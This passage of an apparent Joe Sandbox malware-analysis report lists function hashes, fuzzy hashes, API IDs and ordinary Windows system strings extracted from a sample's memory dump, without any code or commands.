                                                                            • Instruction ID: 0ea680ff5c8b61053a97f181b7af39dbc93e57ed30fec8b42f52a43ad7113a9b
                                                                            • Opcode Fuzzy Hash: 6782a78aa0a193eb060a0ae101a8a25a9ec959a7cc8e41d5c9e6016c21a5608d
                                                                            • Instruction Fuzzy Hash: B0E1D2B19087859FE365CF15C480BAFBBE4FB88314F40892EE5998B380D7719949CF56
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID: Legacy$UEFI
                                                                            • API String ID: 2994545307-634100481
                                                                            • Opcode ID: bcc5af9aea961727d12d647373ebe8c79d9950b07da9371ef381f9f0a88568cd
                                                                            • Instruction ID: 2377b5045c6a7bc94d3dbb2c03f575d4de3b73f4d8c9bdd2f61bf4c0aacb6496
                                                                            • Opcode Fuzzy Hash: bcc5af9aea961727d12d647373ebe8c79d9950b07da9371ef381f9f0a88568cd
                                                                            • Instruction Fuzzy Hash: 1D613B71E00A299FDB14DFA9CC80AAEBBB5FB44700F15407EE649EB291D776A901CF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$MUI
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • kLsE, xrefs: 015B0540
                                                                            • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 015B063D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • RtlpResUltimateFallbackInfo Enter, xrefs: 015BA2FB
                                                                            • RtlpResUltimateFallbackInfo Exit, xrefs: 015BA309
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID: Cleanup Group$Threadpool!
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: MUI
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: P`1wRb1w
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID: __aullrem
                                                                            • String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: .
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: xTy
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: GlobalTags
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: xTy
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: .mui
                                                                            • API String ID: 0-1199573805
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: EXT-
                                                                            • API String ID: 0-1948896318
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: BinaryHash
                                                                            • API String ID: 0-2202222882
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: #
                                                                            • API String ID: 0-1885708031
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: BinaryName
                                                                            • API String ID: 0-215506332
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0163895E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                            • API String ID: 0-702105204
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 94b93c5b78c27de316cecb239067a1008229316c76f7dd9dabadaa5a65dad075
                                                                            • Instruction ID: 9fdf3f7d2df893b3e4bfc26a777a06c127916aa58d7de3e3e45257da804f8380
                                                                            • Opcode Fuzzy Hash: 94b93c5b78c27de316cecb239067a1008229316c76f7dd9dabadaa5a65dad075
                                                                            • Instruction Fuzzy Hash: 4702E2746046518BEB24CF2ECD60275FBF1AF85300B19819EE9D6CB382D335E996DB60
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 743c94b24dba1edfdbdbc7f9e1d66971d251120f723e29e2eaeff24ce68898bf
                                                                            • Instruction ID: ffb0d5ffaedd461392ff03f0fc5286a20521a18151f0aafea998c91714caa2ef
                                                                            • Opcode Fuzzy Hash: 743c94b24dba1edfdbdbc7f9e1d66971d251120f723e29e2eaeff24ce68898bf
                                                                            • Instruction Fuzzy Hash: FDD14573B6471C4FC384DE6EDC82381B2D2ABD4528B5D843C9D18CB303F669E91E6688
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d1c14b8abc3d4eebda49585d820254bfb8b7067349329efb62a173f11e824965
                                                                            • Instruction ID: b933521dae19261a82cfef667b52bad72a9f45a581e7edc78fb9c9c69dfad72b
                                                                            • Opcode Fuzzy Hash: d1c14b8abc3d4eebda49585d820254bfb8b7067349329efb62a173f11e824965
                                                                            • Instruction Fuzzy Hash: A502A071E01219CFDF05CF98C8846ADBBB2FF98314F298169D556AB355EB30AA42CF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8840ea980dd901a7d983832785dc5030be42dc51f05c89ce6e801cfa0a5f7c2a
                                                                            • Instruction ID: 51db0797cf657947e2dea2ee5238bb48ba69bce43858af58b39bd77d7fcd0079
                                                                            • Opcode Fuzzy Hash: 8840ea980dd901a7d983832785dc5030be42dc51f05c89ce6e801cfa0a5f7c2a
                                                                            • Instruction Fuzzy Hash: 47F10672E006158BCB18DF6CCDA167EFBF6AF98210719826DD856DB381E734EA01CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 84e8b1bbe514ab280c80fd4934279282ecfabd7d4488fd6308e29b9ee49b934e
                                                                            • Instruction ID: 70b6f7fc984c41d61196f1dfe98977f29f111c373965a0f783efa3e805c1ef54
                                                                            • Opcode Fuzzy Hash: 84e8b1bbe514ab280c80fd4934279282ecfabd7d4488fd6308e29b9ee49b934e
                                                                            • Instruction Fuzzy Hash: 42F1B573E005269BCB19DEA8C9A057DFBF5AF58210B19426EDC56EB380D734EE41CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                            • Instruction ID: 6f06cbe83029b22a4e13ee80ccd316723d8ff0512a6d208517d6bd08e3130ba0
                                                                            • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                            • Instruction Fuzzy Hash: ADF15C70E0021A9BDB25DFADC980BAEBBF5BF48710F098529E905AB754E774D841CB60
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 024aaae8525d3d79a914a9949313295e7d4e24869d97b484876de4ce6243dd28
                                                                            • Instruction ID: 1d502a1de91ba3c3962ad6396903f2c9e157a4077dd4cba5b1eec44ab8bb1fc6
                                                                            • Opcode Fuzzy Hash: 024aaae8525d3d79a914a9949313295e7d4e24869d97b484876de4ce6243dd28
                                                                            • Instruction Fuzzy Hash: 4AE1D271A042869BDB24CFACDC507BEBBF5BF45310F08841ED49AAB381D775A989CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 16f1730fed5ebc8a5dca582cd52830df288456993fe608bdcc887033a1cce476
                                                                            • Instruction ID: f62cf63b9b26fa16c8ed910cef37300064049d2414c01ee0d1d1f2abc150e3df
                                                                            • Opcode Fuzzy Hash: 16f1730fed5ebc8a5dca582cd52830df288456993fe608bdcc887033a1cce476
                                                                            • Instruction Fuzzy Hash: 8CD1C172A0060A9FDF15CFA9CC41AFEB7F9BF88304F188169D955A7241E735E9068B60
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7f21db1542f6ca58522acf1a8e50a19eaef129cce62517bfc0bae1c2bbe057d8
                                                                            • Instruction ID: cc983d73c33d512c3354f959f4b44a000bf1b43437bf5aba48d8b7d4eb510b18
                                                                            • Opcode Fuzzy Hash: 7f21db1542f6ca58522acf1a8e50a19eaef129cce62517bfc0bae1c2bbe057d8
                                                                            • Instruction Fuzzy Hash: CBE16E71608342CFC715CF28C5D0AAABBE1FF89314F15896DE9998B351EB31E905CB92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 58f26881e74ff63098af7f8b3111846ba053610a6e02cb286406b67dfe17a167
                                                                            • Instruction ID: 851832165fe2eb6be89bf81294352b34d7e11fa3e5dd1a5daa802811250f970e
                                                                            • Opcode Fuzzy Hash: 58f26881e74ff63098af7f8b3111846ba053610a6e02cb286406b67dfe17a167
                                                                            • Instruction Fuzzy Hash: 08D1CF75A406179BDB19DF68CC80ABF7BF5BF94205F48862DE9169F280EB30E950CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5b926b2862480601474b40fc4d692a612fec7635ff4310e2bcd826b11b854b14
                                                                            • Instruction ID: 2009b7881c72dc5b5cb99d7c7f9491b1b734c41f84474c4fc8d08f4d31e5a26c
                                                                            • Opcode Fuzzy Hash: 5b926b2862480601474b40fc4d692a612fec7635ff4310e2bcd826b11b854b14
                                                                            • Instruction Fuzzy Hash: 2AD17B32E0421A8BEB39CF9CC5857BDBBB5FB45310F18842ED946AF285C7B49981CB45
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e1cbbd764ca1a9dd737bafcd14ca33a8fe061f8c97f67030ee56b0c4f9787c98
                                                                            • Instruction ID: 9bd3a3f735212647518277c3f2a5bfadcc49c1597dd8c1f02165c65d3ddfa28e
                                                                            • Opcode Fuzzy Hash: e1cbbd764ca1a9dd737bafcd14ca33a8fe061f8c97f67030ee56b0c4f9787c98
                                                                            • Instruction Fuzzy Hash: 3CD17F31A002198FEB25DFD9CC94BAEB7B6BB85B04F0440ADD909EB241D774AD85CF91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                            • Instruction ID: 79192c505c147ea3638cdb04ef0b4f47e18fa71008a3b4572ec7964a6764ac56
                                                                            • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                            • Instruction Fuzzy Hash: 3FB15E74A00605AFDF24DB99CD40AEBBBBABFC4304F10856DBA5297791DB34E905CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                            • Instruction ID: 87282a10d9323ce85b4c4e64dc40f363481970a0e0e100c63dae302b769e8610
                                                                            • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                            • Instruction Fuzzy Hash: 3AB1F135604646EFDB25CFA8C850BBEBBF6BF84700F184599E6529B385DB30E941CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ddcf792a8aa9186c137a905fa9914e637230def07506372d6ab4e70e423cadc7
                                                                            • Instruction ID: f7552c05496cef986bf9d89f979eb3bc12dea7be345e1e1b6ec6b0eebc5dcb8a
                                                                            • Opcode Fuzzy Hash: ddcf792a8aa9186c137a905fa9914e637230def07506372d6ab4e70e423cadc7
                                                                            • Instruction Fuzzy Hash: 44C158745083418FD764DF29C884BAAB7E9BF88304F44495DEA898B391E774E908CF92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 17ca3802ec2d6381aaf97fc6942b8c2fbdf2ad0edac35762cb42b10ced7d794b
                                                                            • Instruction ID: a483b0532c4f42f3f57e15907dd889a79e334f4cb5af1f0f11ea72048d0efd57
                                                                            • Opcode Fuzzy Hash: 17ca3802ec2d6381aaf97fc6942b8c2fbdf2ad0edac35762cb42b10ced7d794b
                                                                            • Instruction Fuzzy Hash: 8BB17270A402568BDB65DF58C890BADB7F5FF48740F4485E9E54AAB281EB30DD85CB20
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c5c7d338169a516812a5f34b42bb6e0f1e89e6e01bb97fc05138efb3975d1452
                                                                            • Instruction ID: 8cff2803c402d9a3505db11a21679615ce461245b9128b11d85d3211b5d79fbc
                                                                            • Opcode Fuzzy Hash: c5c7d338169a516812a5f34b42bb6e0f1e89e6e01bb97fc05138efb3975d1452
                                                                            • Instruction Fuzzy Hash: E6A11231E0065A9FEB32DB9CCC45BAEBBB4FB00754F0901A5EA11AF295D774AD44CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: dc0e96865e489233e54de63f85e95622ddf380b2b956e777998c9d505f7adcf2
                                                                            • Instruction ID: 309e8ba094ff0fdb34a6a31102016a70de9ef91cafae2907390d5499ac8a9e65
                                                                            • Opcode Fuzzy Hash: dc0e96865e489233e54de63f85e95622ddf380b2b956e777998c9d505f7adcf2
                                                                            • Instruction Fuzzy Hash: C461F671E0021B9BDB15AEA9CC999BFB77ABF54211F148439ED21A7340EB70DA41CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
